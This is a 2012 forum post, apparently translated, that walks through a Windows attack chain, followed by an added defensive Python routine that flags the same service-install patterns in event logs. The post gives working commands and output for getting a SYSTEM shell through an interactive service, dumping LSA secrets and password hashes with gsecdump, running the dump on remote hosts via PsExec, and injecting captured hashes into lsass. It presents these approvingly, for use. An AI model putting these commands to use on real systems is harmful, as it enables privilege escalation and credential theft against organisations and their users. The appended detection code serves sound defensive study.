Views: 1862 | Replies: 0

Hash injection attack

Original poster
Posted on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to import the hash information just captured with gsecdump into the local lsass process, which carries out the hash injection attack. The foreigners really are good at this; admins are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, actually never need to be cracked at all; this is simply a matter of using the tool. As the original article puts it well: whether the password is set to 4 characters or 127, once you have the hash, it's 100% done.

Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
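Added example, not part of the original post or of the TrueSec article it quotes: a small Python triage routine for the service-install pattern shown above, written from the defender's side. It assumes that "A service was installed in the system" events (System log, Event ID 7045 on current Windows versions) have been exported into simple dicts; the field names, the numeric service_type value (the SCM Type value that sc config and the registry show, rather than the event's text description) and the three records are this example's own constructed simplification, not real log data. The rules look for exactly what the post's commands leave behind: a service created with type= interact, a shell such as cmd.exe as the service image, and PsExec's default service name.

```python
"""Triage Windows service-install events (System log, Event ID 7045) for the
patterns shown in the post: an interactive service whose image is cmd.exe, and
PsExec's default service.  Constructed example: the records below are a
simplified dict form of the Event 7045 fields, not real log data."""
import ntpath

# Bits of the service Type value; "sc create ... type= own type= interact"
# yields SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS = 0x110.
SERVICE_INTERACTIVE_PROCESS = 0x100
SERVICE_WIN32_OWN_PROCESS = 0x10

# Interpreters that should essentially never be the image of a service.
SHELL_BINARIES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# PsExec's default service name; a renamed service (-r) needs other telemetry.
PSEXEC_SERVICE_NAMES = {"psexesvc"}

# Constructed records (field names are this example's own simplification).
CONSTRUCTED_EVENTS = [
    {"event_id": 7045, "service_name": "shellcmdline",
     "image_path": "C:\\WINDOWS\\system32\\cmd.exe /K start",
     "service_type": SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
     "account": "LocalSystem"},
    {"event_id": 7045, "service_name": "PSEXESVC",
     "image_path": "%SystemRoot%\\PSEXESVC.exe",
     "service_type": SERVICE_WIN32_OWN_PROCESS, "account": "LocalSystem"},
    {"event_id": 7045, "service_name": "ExampleBackup",
     "image_path": "\"C:\\Program Files\\Example\\backupsvc.exe\" --daemon",
     "service_type": SERVICE_WIN32_OWN_PROCESS,
     "account": "NT AUTHORITY\\NetworkService"},
]


def image_binary(image_path: str) -> str:
    """Lower-case basename of the executable in an ImagePath.

    A quoted path is taken up to the closing quote; an unquoted one up to the
    first space (so an unquoted path containing spaces is truncated, which is
    itself a misconfiguration worth a separate rule).
    """
    path = image_path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        exe = path[1:end] if end != -1 else path[1:]
    else:
        exe = path.split(" ", 1)[0]
    return ntpath.basename(exe).lower()


def analyze_service_install(record: dict) -> list:
    """Return the names of the rules that fire for one record ([] if benign)."""
    hits = []
    if record.get("event_id") != 7045:
        return hits
    if record.get("service_type", 0) & SERVICE_INTERACTIVE_PROCESS:
        hits.append("interactive_service")   # "type= interact" in the post
    if image_binary(record["image_path"]) in SHELL_BINARIES:
        hits.append("shell_as_service")      # cmd.exe /K start as a service
    if record["service_name"].lower() in PSEXEC_SERVICE_NAMES:
        hits.append("psexec_service")        # remote execution via PsExec
    return hits


def triage(records) -> dict:
    """Map service name -> firing rules, keeping only records with a hit."""
    findings = {}
    for rec in records:
        hits = analyze_service_install(rec)
        if hits:
            findings[rec["service_name"]] = hits
    return findings


if __name__ == "__main__":
    for name, rules in triage(CONSTRUCTED_EVENTS).items():
        print(f"{name}: {', '.join(rules)}")
```

Run as-is it reports shellcmdline (interactive_service, shell_as_service) and PSEXESVC (psexec_service) and stays silent on the benign backup service. The interactive bit is the strongest of the three signals, because legitimate services on modern Windows almost never request it; the PsExec name rule is the weakest, since the service can be renamed, so in practice it should be paired with Security event 4697 or Sysmon process-creation telemetry rather than used alone.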